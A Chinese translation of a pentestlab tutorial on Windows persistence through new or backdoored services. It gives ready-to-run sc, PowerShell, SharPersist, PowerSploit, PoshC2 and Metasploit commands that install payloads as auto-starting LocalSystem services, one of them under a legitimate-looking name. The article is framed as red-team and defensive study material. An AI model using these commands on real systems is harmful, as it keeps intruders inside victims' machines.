1. 程式人生 > 其它 >Window許可權維持(三):新服務

Window許可權維持(三):新服務

Window許可權維持(三):新服務

系統安全 Bypass007 2019-12-04 7,159  

如果未正確配置Windows環境中的服務或這些服務可以用作永續性方法,則這些服務可能導致許可權提升。建立一個新的服務需要管理員級別的特權,它已經不是隱蔽的永續性技術。然而,在紅隊的行動中,針對那些在威脅檢測方面還不成熟的公司,可以用來製造進一步的干擾,企業應建立SOC能力,以識別在其惡意軟體中使用基本技術的威脅。

命令列實現

如果帳戶具有本地管理員特權,則可以從命令提示符建立服務。引數“ binpath ”用於執行任意有效負載,而引數“ auto ”用於確保惡意服務將自動啟動。

sc create pentestlab binpath= "cmd.exe /k C:temppentestlab.exe" start="auto" obj="LocalSystem"sc start pentestlab

CMD –新服務

或者,可以直接從PowerShell建立新服務。

New-Service -Name "pentestlab" -BinaryPathName "C:temppentestlab.exe" -Description "PentestLaboratories" -StartupType Automatic
sc start pentestlab

PowerShell永續性–新服務

在兩種情況下,啟動服務時都會開啟Meterpreter會話。

Meterpreter –新服務

SharPersist

SharPersist支援在受感染系統中建立新服務的永續性技術。在系統上安裝新服務需要提升的訪問許可權(本地管理員)。以下命令可用於新增新服務,該服務將在Windows啟動期間作為本地系統執行任意有效負載。

SharPersist -t service -c "C:WindowsSystem32cmd.exe" -a "/c pentestlab.exe" -n "pentestlab" -m add

SharPersist–新增服務

Meterpreter會話將再次建立,或者與任何其他能夠與有效負載進行通訊的命令和控制框架建立連線。

SharPersist–通過服務的計劃任務

PowerSploit

PowerSploit可用於對合法服務進行後門程式以實現永續性。可以利用兩個PowerShell函式來修改現有服務的二進位制路徑,或者從先前手動建立的自定義服務中修改二進位制路徑,以執行任意有效負載。

Set-ServiceBinPath -Name pentestlab -binPath "cmd.exe /k C:temppentestlab.exe"Write-ServiceBinary -Name pentestlab -Command "cmd.exe /k C:temppentestlab.exe"

PowerSploit –永續性

PoshC2

PoshC2還具有建立新服務作為永續性技術的能力。但是,將執行base-64 PowerShell負載,而不是任意可執行檔案。從植入物處理機,以下模組將自動執行該技術。

install-servicelevel-persistence

PoshC2永續性–安裝新服務

PoshC2將自動生成有效負載,並且該命令將在目標系統上執行以建立新服務。

PoshC2永續性–新服務

該服務將自動啟動,並具有名稱“ CheckpointServiceUpdater ”,以使其看起來合法。

PoshC2永續性–建立新服務

Metasploit

Metasploit框架具有一個後開發模組,該模組支援兩種永續性技術。

  1. 登錄檔執行鍵

  2. 新服務

需要將啟動變數修改為SERVICE,以便在系統上安裝新服務。

use post/windows/manage/persistence_exe
set REXEPATH /tmp/pentestlab.exe
set SESSION 1set STARTUP SERVICE
set LOCALEXEPATH C:\tmp
run

Metasploit永續性模組–服務

需要Metasploit多重/處理程式模組來捕獲有效負載並與受感染的主機建立Meterpreter會話。

Metasploit Meterpreter –通過新服務的永續性

譯文宣告:本文由Bypass整理並翻譯,僅用於安全研究和學習之用。
原文地址:https://pentestlab.blog/2019/10/07/persistence-new-service/

 

本文作者:Bypass007

本文為安全脈搏專欄作者釋出,轉載請註明:https://www.secpulse.com/archives/119959.html

Tags: metasploitPoshC2PowerSploitSharPersistWindow許可權維持命令列實現新服務